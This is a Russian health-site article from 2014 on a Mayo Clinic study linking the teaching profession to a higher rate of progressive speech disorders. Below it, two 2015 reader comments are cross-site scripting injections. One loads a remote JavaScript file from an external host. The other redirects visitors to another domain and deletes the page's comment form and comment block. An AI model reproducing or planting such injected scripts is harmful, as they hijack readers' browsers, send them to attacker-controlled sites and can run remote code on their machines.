Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Учителя теряют дар речи ч...  >>  Учителя теряют дар речи чаще всех
 
Обратная связь
 

Учителя теряют дар речи чаще всех

Размер шрифта
02 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Профессия учителя напрямую связана с общением, умением красиво и правильно рассказать о своем предмете. Однако совсем недавно ученые выявили неожиданную профессиональную вредность для этой специальности. Как ни странно, именно среди учителей наиболее часто встречаются серьезные расстройства речи.

Учителя теряют дар речи чаще всех

Исследование, опубликованное в American Journal of Alzheimer's Disease & Other Dementias, показало, что у учителей риск развития нарушений речи в 3,5 раза выше, чем болезни Альцгеймера.

Расстройства речи обычно характеризуются потерей людьми способности к общению – они не могут найти нужные слова, чтобы построить фразы и предложения. У них также могут быть проблемы с произнесением конкретных звуков и правильной артикуляцией. Речевые нарушения  – это совсем не то же самое, что болезнь Альцгеймера, которая в основном представлена нарушениями памяти. Прогрессирующие расстройства речи являются дегенеративными и ведут к смерти в среднем через 8-10 лет после постановки диагноза.

В исследовании ученые проанализировали группу из ста пациентов с нарушениями речи и отметили, что многие из них работали учителями. Для контроля их сравнили с группой, включавшей более 400 пациентов с болезнью Альцгеймера, находившихся на лечении в клинике Майо. У учителей риск развития речевых нарушений  был в 3,5 раза выше риска развития у них болезни Альцгеймера. Причем для всех остальных профессий не было различий между группой нарушений речи и группой болезни Альцгеймера.

При анализе данных о переписи населения 2008 года, в группе людей с нарушениями речи доля учителей была повышена, причем это согласовывалось с данными, полученными учеными при сравнении с болезнью Альцгеймера.

«Это исследование имеет важное значение для ранней диагностики расстройств речи», – утверждает невролог из Клиники Майо, доктор Кейт Джозефс, ведущий автор работы. Крупное исследование, направленное конкретно на учителей, может помочь в обнаружении факторов риска развития этих нарушений.

«Учителя много общаются ежедневно», – говорит доктор Джозефс. «Это профессия, требующая большой отдачи, и учителя могут быть более чувствительными к развитию нарушений речи».

Даже такая безопасная на первый взгляд профессия – учитель, может иметь свои недостатки и профессиональные вредности. Не стоит забывать об этом факторе риска.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:30

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему вам кажется, что начальник злой?   Какой напиток не позволит вам ослепнуть?!   Сплетничайте на здоровье! Оказывается, это полезно   Обычная витаминка против старости!  
12 июля 2013Как мы мжоем чтиать слвоа, кодга все бвукы перпуетнаы? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Пока не выпью кофе, я не человек. 7 причин начать утро с кофе
Как сохранить мозги в 40 лет
Как сохранить мозги в 30 лет

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.